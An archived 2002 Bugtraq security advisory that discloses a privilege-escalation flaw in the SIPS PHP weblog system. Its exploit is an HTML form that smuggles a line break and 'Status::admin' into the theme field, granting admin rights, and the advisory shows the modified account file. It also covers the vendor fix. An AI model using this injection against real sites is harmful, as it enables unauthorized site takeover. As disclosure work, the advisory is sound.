[24259] in bugtraq
SIPS - vulnerable to anyone gaining admin access.
daemon@ATHENA.MIT.EDU (b0iler _)
Wed Feb 13 17:50:32 2002
From: "b0iler _" <b0iler@hotmail.com>
To: bugtraq@securityfocus.com
Date: Mon, 11 Feb 2002 23:13:11 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F460Puz63Bma4RCIlWr00002b4c@hotmail.com>
#!/exploit/by/b0iler
# sips - http://sourceforge.net/projects/sips/
# versions lower than 0.3.1
Taken from freshmeat: "About: SIPS is an integrated Weblog and link-indexing
system written in PHP. It is aimed at those with access to databaseless,
PHP-enabled Web servers who want to run a Weblog site like Slashdot and/or a
simple link index like Yahoo!."
Ok, this one took awhile to find since the code is long, but atleast it was
fairly easy to read. The script works much like phpnuke or slashcode, SIPS
stands for Simple Internet Publishing System. The problem that I found was
when a user selects a theme to use it is written in their database file.
Then when a user goes to use admin.php it just checks if the password for
the user is correct and if they have the value Status equal to admin in
their database. So I did alittle playing around and got a theme to do a
linebreak and write Status::admin onto the end of the user's database. This
makes the user an admin of the script giving them complete control over the
site.
Key to securing this code is to filter all input, even if you think it won't
be changed by the user.. it can be. Also checking to make sure the theme
exists might be good. To exploit this we just need to change the theme's
page to something like this:
<form action="http://www.site.com/sips/htdocs/preferences.php"
method="post">
<input type="hidden" name="op" value="theme">
<input type="hidden" name="action" value="settheme">
<select name="themename">
<option value="default
Status::admin
">Exploited</option>
</select>
<input type="submit" value="Set Theme"></form>
Here we submit a theme with the value of:
Default -linebreak
Status::admin -linebreak (SIPS chops the theme input).
This will change an account from something like this:
bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler@hotmail.com
Theme::default
Timezone::Greenwich Mean
to something like this:
bash-2.03$ cat user
Password::660120d6fbc1sn241be39290636b2942
Email::b0iler@hotmail.com
Timezone::Greenwich Mean
Theme::default
Status::admin
The Status::admin allows you to use
http://www.site.com/sips/htdocs/admin/index.php, which will give you total
control over SIPS (pretty much the whole site).
The author was contacted on 2/1/02 and replied the same day. Author updated
to version 0.3.1 on 2/8/02 and wrote a very nice page detailing the problem
and possible solutions: http://sips.sourceforge.net/adminvul.html
-http://b0iler.advknowledge.net
_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail.
http://www.hotmail.com
